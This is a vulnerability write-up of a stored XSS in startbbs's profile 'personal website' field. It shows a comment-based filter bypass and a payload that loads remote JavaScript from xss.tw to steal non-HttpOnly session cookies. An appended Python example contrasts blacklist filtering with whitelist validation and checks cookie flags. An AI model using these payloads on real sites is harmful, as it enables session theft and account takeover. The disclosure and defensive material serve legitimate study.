Stored XSS in startbbs because user output is not properly filtered

startbbs adopts an MVC architecture design. However, improper filtering of the input and output of users' personal data results in a cross-site scripting vulnerability.

1. The target is a field that multiple users can fill in. I will use the "personal website" field of the profile for testing. First, enter "onmouseover=alert(1) and observe that it is filtered into: (screenshot). After testing, it turns out that every on... followed by an equal sign is filtered. Is that the end of it? Not quite. After fuzzing, we found this bypass: onmouseover<!---->="alert(1)// This works because the <!----> comment lands in exactly the right spot, and the < and > characters are not filtered here, so the filter can be bypassed.

However, when it came to loading JS, the situation was far from as simple as I thought. In this case onmouseover cannot be used, only onclick. Because the site uses jQuery, we can write "onclick<!---->=$.getScript('http://xss.tw/5524'). Then the next problem appears: this form is not triggered, because a double quotation mark is added: (screenshot). Interesting. We can close it by adding a " before $.getScript: "onclick<!---->="$.getScript('http://xss.tw/5524'). After a user clicks my personal website link, it becomes: (screenshot).

There may be a question: why can't the data be obtained? Because the cookie storage on xss.tw has been full recently, whatever data is returned shows up empty. Sadly. We can still check whether our cookies are HttpOnly: (screenshot). Confirmed:

The above makes it clear. Although xss.tw did not obtain the cookie for logging in, it has been proven that JS can be introduced this way, and the cookie is not set with the HttpOnly flag. Therefore, attackers can target the administrator blind.

Solution: check user input and output carefully, and use whitelist filtering.
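The following Python is an added example, not startbbs's own code (the post does not show the project's filter). It contrasts a blacklist filter of the kind the post describes with the whitelist-and-encode approach the solution recommends, using the post's own "personal website" field as the scenario, and adds the Set-Cookie HttpOnly check the post performs by hand. The names blacklist_filter, validate_website, render_whitelisted and cookie_flags are assumptions, as are the regexes that reconstruct the observed filtering behaviour and the sample Set-Cookie header.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample inputs for the "personal website" profile field:
# a benign URL and the two payload forms discussed in the post.
BENIGN_URL = "https://example.com/~user"
PLAIN_PAYLOAD = '"onmouseover=alert(1)'
COMMENT_PAYLOAD = '"onclick<!---->="$.getScript(\'http://xss.tw/5524\')'

# Assumed reconstruction of a blacklist filter: strip every "on...=" pair,
# then drop HTML comments. This is hypothetical, not startbbs's own code;
# it only reproduces the behaviour the post observed.
EVENT_ATTR = re.compile(r"on\w+\s*=", re.IGNORECASE)
HTML_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)


def blacklist_filter(value: str) -> str:
    """Weak approach: remove on*= sequences, then comments, keep the rest."""
    return HTML_COMMENT.sub("", EVENT_ATTR.sub("", value))


def render_blacklisted(value: str) -> str:
    """Interpolate the filtered value straight into an href attribute."""
    return f'<a href="{blacklist_filter(value)}">site</a>'


def validate_website(value: str) -> Optional[str]:
    """Whitelist: only absolute http(s) URLs made of printable ASCII,
    with a plain host[:port] and no quotes or angle brackets at all."""
    if not value or len(value) > 255:
        return None
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in value):
        return None
    if any(c in value for c in '"\'<>'):
        return None
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if not re.fullmatch(r"[A-Za-z0-9.-]+(:\d{1,5})?", parts.netloc):
        return None
    return value


def render_whitelisted(value: str) -> str:
    """Validate first, then entity-encode on output; a rejected value is
    rendered as no link at all rather than as partially cleaned text."""
    url = validate_website(value)
    if url is None:
        return "<span>no website</span>"
    return f'<a href="{html.escape(url, quote=True)}">site</a>'


def cookie_flags(set_cookie: str) -> dict:
    """Parse one Set-Cookie header value and report whether the HttpOnly
    and Secure attributes are present (the check the post performs)."""
    segments = [s.strip() for s in set_cookie.split(";")]
    name = segments[0].split("=", 1)[0].strip()
    attrs = {s.split("=", 1)[0].strip().lower() for s in segments[1:]}
    return {"name": name, "httponly": "httponly" in attrs, "secure": "secure" in attrs}


if __name__ == "__main__":
    for payload in (PLAIN_PAYLOAD, COMMENT_PAYLOAD):
        print("blacklist:", render_blacklisted(payload))
        print("whitelist:", render_whitelisted(payload))
    # Constructed Set-Cookie header lacking HttpOnly, as the post observed
    print(cookie_flags("sessid=CONSTRUCTED; Path=/"))
```

The blacklist path shows why stripping patterns is fragile: the comment-separated form never matches on...= and survives into the attribute. The whitelist path does not try to recognise bad input at all; it accepts only what a website URL may look like and encodes on output, so anything else never reaches the markup. The cookie_flags helper reads a single Set-Cookie value, which is enough to confirm whether a session cookie carries HttpOnly before an XSS finding is triaged.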